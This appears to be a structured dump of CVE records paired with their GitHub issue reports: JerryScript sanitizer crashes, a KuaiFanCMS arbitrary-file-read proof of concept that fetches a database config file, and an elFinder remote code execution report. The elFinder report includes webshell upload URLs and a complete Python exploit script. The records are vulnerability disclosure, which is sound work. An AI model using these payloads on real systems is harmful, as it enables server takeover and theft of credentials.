###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` throw new SyntaxError("[0: 98, 1: 54, 8: false, 10: 21, foo: bar]"); ``` ###### Output ``` Error: Failed to open file: 0 ASAN:DEADLYSIGNAL ================================================================= ==13994==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000 (pc 0x5678dd4b bp 0xffca4f88 sp 0xffca4d10 T0) ==13994==The signal is caused by a READ memory access. ==13994==Hint: address points to the zero page. #0 0x5678dd4a in main_print_unhandled_exception /root/jerryscript/jerry-main/main-utils.c:341 #1 0x5678baae in main /root/jerryscript/jerry-main/main-unix.c:140 #2 0xf7760f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #3 0x5662c3d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-main/main-utils.c:341 in main_print_unhandled_exception ==13994==ABORTING ``` Credits: Found by chong from OWL337.
SEGV in main_print_unhandled_exception
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4403/comments
0
2021-01-02T14:31:59Z
2021-01-08T15:03:34Z
https://github.com/jerryscript-project/jerryscript/issues/4403
777,469,465
4,403
2,049
CVE-2021-26199
2021-06-10T23:15:08.467
An issue was discovered in JerryScript 2.4.0. There is a heap-use-after-free in ecma_bytecode_ref in ecma-helpers.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4056" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4056" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/jerryscript-project/jerryscript/issues/4056
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision da5b058 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` function echo(RegExp) { try { (r).compile(r).compile(RegExp.prototype) } catch (err) { } } var suppressLastIndex = false; var suppressRegExp = false; var suppressIndex = false; function safeCall(f) { var args = []; for (var a = 1; a < arguments.length; ++a) args.push(arguments[a]); try { return f.apply(this, args); } catch (ex) { echo("EXCEPTION"); } } function dump(o) { var sb = []; if (o === null) sb.push("null"); else if (o === undefined) sb.push("undefined"); else if (o === true) sb.push("true"); else if (o === false) sb.push("false"); else if (typeof o === "number") sb.push(o.toString()); else if (typeof o == "string") { if (o.length > 8192) sb.push("<long string>"); else { sb.push("\""); var start = -1; for (var i = 0; i < o.length; i++) { var c = o.charCodeAt(i); if (c < 32 || c > 127 || c == '"'.charCodeAt(0) || c == '\\'.charCodeAt(0)) { if (start >= 0) sb.push(o.substring(start, i)); start = -1; sb.push("\\u"); sb.push(String.fromCharCode(hex.charCodeAt((c >> 12) & 0xf))); sb.push(String.fromCharCode(hex.charCodeAt((c >> 8) & 0xf))); sb.push(String.fromCharCode(hex.charCodeAt((c >> 4) & 0xf))); sb.push(String.fromCharCode(hex.charCodeAt((c >> 0) & 0xf))); } else { if (start < 0) start = i; } } if (start >= 0) sb.push(o.substring(start, o.length)); sb.push("\""); } } else if (o instanceof RegExp) { var body = o.source; sb.push("/"); var start = -1; for (var i = 0; i < body.length; i++) { var c = body.charCodeAt(i); if (c < 32 || c > 127) { if (start >= 0) sb.push(body.substring(start, i)); start = -1; sb.push("\\u"); sb.push(String.fromCharCode(hex.charCodeAt((c >> 12) & 0xf))); sb.push(String.fromCharCode(hex.charCodeAt((c >> 8) & 0xf))); sb.push(String.fromCharCode(hex.charCodeAt((c >> 4) & 0xf))); sb.push(String.fromCharCode(hex.charCodeAt((c >> 0) & 0xf))); } else { if (start < 0) start = i; } } if (start >= 0) sb.push(body.substring(start, body.length)); sb.push("/"); if (o.global) sb.push("g"); if (o.ignoreCase) sb.push("i"); if (o.multiline) sb.push("m"); if (!suppressLastIndex && o.lastIndex !== undefined) { sb.push(" /*lastIndex="); sb.push(o.lastIndex); sb.push("*/ "); } } else if (o.length !== undefined) { sb.push("["); for (var i = 0; i < o.length; i++) { if (i > 0) sb.push(","); sb.push(dump(o[i])); } sb.push("]"); if (!suppressIndex && (o.input !== undefined || o.index !== undefined)) { sb.push(" /*input="); sb.push(dump(o.input)); sb.push(", index="); sb.push(dump(o.index)); sb.push("*/ "); } } else if (o.toString !== undefined) { sb.push("<object with toString>"); } else sb.push(o.toString()); return sb.join(""); } function pre(w, origargs, n) { var sb = [w]; sb.push("("); for (var i = 0; i < n; i++) { if (i > 0) sb.push(", "); sb.push(dump(origargs[i])); } if (origargs.length > n) { sb.push(", "); sb.push(dump(origargs[n])); origargs[0].lastIndex = origargs[n]; } sb.push(");"); echo(sb.join("")); } function post(r) { if (!suppressLastIndex) { echo("r.lastIndex=" + dump(r.lastIndex)); } if (!suppressRegExp) { var sb = []; sb.push("RegExp.${_,1,...,9}=["); sb.push(dump(RegExp.$_)); for (var i = 1; i <= 9; i++) { sb.push(","); sb.push(dump(RegExp["$" + i])); } sb.push("]"); echo(sb.join("")); } } function exec(r, s) { pre("exec", arguments, 2); echo(dump(r.exec(s))); post(r); } function test(r, s) { pre("test", arguments, 2); echo(dump(r.test(s))); post(r); } function replace(r, s, o) { pre("replace", arguments, 3); echo(dump(s.replace(r, o))); post(r); } function split(r, s) { pre("split", arguments, 2); echo(dump(s.split(r))); post(r); } function match(r, s) { pre("match", arguments, 2); echo(dump(s.match(r))); post(r); } function search(r, s) { pre("search", arguments, 2); echo(dump(s.search(r))); post(r); } function bogus(r, o) { echo("bogus(" + dump(r) + ", " + dump(o) + ");"); try { new RegExp(r, o); echo("FAILED"); } catch (e) { echo("PASSED"); } } var r, s; r = /a*/g; s = "cdsddfs"; exec(r, s); exec(r, s); ``` ###### Output ``` ================================================================= ==80830==ERROR: AddressSanitizer: heap-use-after-free on address 0xf6502022 at pc 0x08073345 bp 0xffe00ad8 sp 0xffe00ac8 READ of size 2 at 0xf6502022 thread T0 #0 0x8073344 in ecma_bytecode_ref /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1344 #1 0x80b41fb in ecma_op_create_regexp_from_bytecode /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:362 #2 0x8133fe1 in ecma_builtin_regexp_prototype_compile /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:320 #3 0x813455b in ecma_builtin_regexp_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:567 #4 0x808281d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1216 #5 0x80829c3 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1240 #6 0x8098e38 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:845 #7 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #8 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #9 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #10 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #11 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #12 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #13 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #14 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #15 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #16 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #17 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #18 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #19 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #20 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #21 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #22 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #23 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #24 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #25 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #26 0x80f9aff in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:339 #27 0x804def4 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:579 #28 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #29 0xf7888646 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18646) #30 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf6502022 is located 2 bytes inside of 24-byte region [0xf6502020,0xf6502038) freed by thread T0 here: #0 0xf7abda84 in free (/usr/lib32/libasan.so.2+0x96a84) #1 0x80c2885 in jmem_heap_free_block_internal /home/jerryscript/jerry-core/jmem/jmem-heap.c:476 #2 0x80c2c1d in jmem_heap_free_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:685 #3 0x80738ff in ecma_bytecode_deref /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1467 #4 0x8133fd0 in ecma_builtin_regexp_prototype_compile /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:319 #5 0x813455b in ecma_builtin_regexp_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:567 #6 0x808281d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1216 #7 0x80829c3 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1240 #8 0x8098e38 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:845 #9 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #10 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #11 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #12 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #13 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #14 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #15 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #16 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #17 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #18 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #19 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #20 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #21 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #22 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #23 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #24 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #25 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #26 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #27 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #28 0x80f9aff in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:339 #29 0x804def4 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:579 previously allocated by thread T0 here: #0 0xf7abe144 in __interceptor_realloc (/usr/lib32/libasan.so.2+0x97144) #1 0x80c2bfe in jmem_heap_realloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:674 #2 0x80eb507 in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:144 #3 0x80b412e in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:336 #4 0x8133ff7 in ecma_builtin_regexp_prototype_compile /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:323 #5 0x813455b in ecma_builtin_regexp_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:567 #6 0x808281d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1216 #7 0x80829c3 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1240 #8 0x8098e38 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:845 #9 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #10 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #11 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #12 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #13 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #14 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #15 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #16 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #17 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #18 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #19 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #20 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #21 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #22 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #23 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943 #24 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142 #25 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778 #26 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690 #27 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792 #28 0x80f9aff in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:339 #29 0x804def4 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:579 SUMMARY: AddressSanitizer: heap-use-after-free /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1344 ecma_bytecode_ref Shadow bytes around the buggy address: 0x3eca03b0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x3eca03c0: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd 0x3eca03d0: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x3eca03e0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fa 0x3eca03f0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00 =>0x3eca0400: 00 fa fa fa[fd]fd fd fa fa fa fd fd fd fa fa fa 0x3eca0410: fd fd fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x3eca0420: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x3eca0430: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa 0x3eca0440: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fd 0x3eca0450: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==80830==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337.
heap-use-after-free in ecma_bytecode_ref
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4056/comments
0
2020-07-25T14:58:50Z
2020-07-28T08:47:38Z
https://github.com/jerryscript-project/jerryscript/issues/4056
665,599,573
4,056
2,050
CVE-2021-3256
2021-06-11T20:15:08.637
KuaiFanCMS V5.x contains an arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/poropro/kuaifan/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/poropro/kuaifan/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kuaifan:kuaifancms:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "4ECFC35F-4E89-49AE-A8E5-D6A1E0B17E2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "88" ]
88
https://github.com/poropro/kuaifan/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "poropro", "kuaifan" ]
Hello, I found that there is a Arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file on the website. The html_url parameter is not filtered for dangerous characters, resulting in a vulnerability.This vulnerability requires logging in to the background. ![1](https://user-images.githubusercontent.com/46889440/104427835-b001fe80-55be-11eb-9977-1ad77642b7e9.png) Read the database configuration file through the vulnerability ![image](https://user-images.githubusercontent.com/46889440/104427220-f4d96580-55bd-11eb-9c92-bbe78754326e.png) ![image](https://user-images.githubusercontent.com/46889440/104427229-f73bbf80-55bd-11eb-837d-174256ea2c1e.png) **poc**: POST /index.php?m=admin&allow=VsexFwGXtxWFB9EypPDSLC7g-&vs=5&c=chakanhtml&a=index HTTP/1.1 Host: kuaifan.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 98 Referer: http://kuaifan.com/index.php?m=admin&allow=VsexFwGXtxWFB9EypPDSLC7g-&vs=5&c=chakanhtml Cookie: PHPSESSID=93tspfs5s9e6dog3245nkiq3d7; backhttp[0]=http%3A%2F%2Fkuaifan.com%2Findex.php%3Fm%3Dadmin%26allow%3DVsexFwGXtxWFB9EypPDSLC7g-%26c%3Dchakanhtml; backhttp[1]=http%3A%2F%2Fkuaifan.com%2Findex.php%3Fm%3Dadmin%26allow%3DVsexFwGXtxWFB9EypPDSLC7g-%26c%3Dchakanhtml%26a%3Dindex; backhttp[2]=http%3A%2F%2Fkuaifan.com%2Findex.php%3Fm%3Dadmin%26allow%3DVsexFwGXtxWFB9EypPDSLC7g-%26c%3Dchakanhtml; UM_distinctid=1735aa0c7f16b6-00d9b452785a7a-12666d4a-144000-1735aa0c7f2581 Connection: close Upgrade-Insecure-Requests: 1 html_url=caches%2Fconfig.php&html_view=0&html_head=0&dosubmit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E7%9C%8B
Arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php
https://api.github.com/repos/poropro/kuaifan/issues/3/comments
0
2021-01-13T08:41:16Z
2021-01-19T03:45:53Z
https://github.com/poropro/kuaifan/issues/3
784,905,409
3
2,051
CVE-2021-23394
2021-06-13T11:15:14.290
The package studio-42/elfinder before 2.1.58 are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities/" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Studio-42/elFinder" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Studio-42/elFinder/commit/75ea92decc16a5daf7f618f85dc621d1b534b5e1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Studio-42/elFinder/issues/3295" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-1290554" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Studio-42/elFinder" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Studio-42/elFinder/commit/75ea92decc16a5daf7f618f85dc621d1b534b5e1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Studio-42/elFinder/issues/3295" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-1290554" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*", "matchCriteriaId": "AEA17C8B-00A9-4E58-A2F3-1D276D1C13B7", "versionEndExcluding": "2.1.58", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/Studio-42/elFinder/issues/3295
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Studio-42", "elFinder" ]
1. create a .phar file using the following URL: http://hostname/elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.phar 2. Add PHP code in the webshell.phar file by following GET request: http://hostname/elFinder/php/connector.minimal.php?cmd=put&target=<hash_of_the_shell.phar_file_from_step1_response>&content=`<?=system($_GET[0]);?>` 3. Execute the OS command with the privilege of the webserver: http://hostname/elFinder/files/webshell.phar?0=id Tested on apache and nginx webservers. By default it works in apache webserver and it requires .phar file to be executed as php code in nginx ``` Python POC: import http.client, urllib.parse,sys,re from pwn import * import pwnlib.util.web Author="Ashok Chand" print("Author: ",Author) def main(): if len(sys.argv)==1: print("Usage: python3 elfinder_2.1.57_exploit.py <ip>") sys.exit(0) host=sys.argv[1] headers={"Host":host} connect=http.client.HTTPConnection(host) connect.request("GET","/elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.phar") response=connect.getresponse() x=response.read() file_hash=re.findall(b'l1_[A-Za-z0-9]{10,18}',x) for h in file_hash: hash_file=h.decode() connect.request("GET","/elFinder/php/connector.minimal.php?cmd=put&content=<?='';system($_GET[0]);?>&target="+hash_file) while True: cmd=raw_input("cmd>") print(cmd) url=f"http://{host}/elFinder/files/webshell.phar?0={cmd.decode()}" res=wget(url, timeout=20) print(res.decode()) if __name__=="__main__": main() ```
Remote Code Execution in elFinder 2.1.57
https://api.github.com/repos/Studio-42/elFinder/issues/3295/comments
9
2021-05-08T17:34:35Z
2021-06-08T11:18:24Z
https://github.com/Studio-42/elFinder/issues/3295
881,092,180
3,295
2,052
CVE-2020-21316
2021-06-15T20:15:11.300
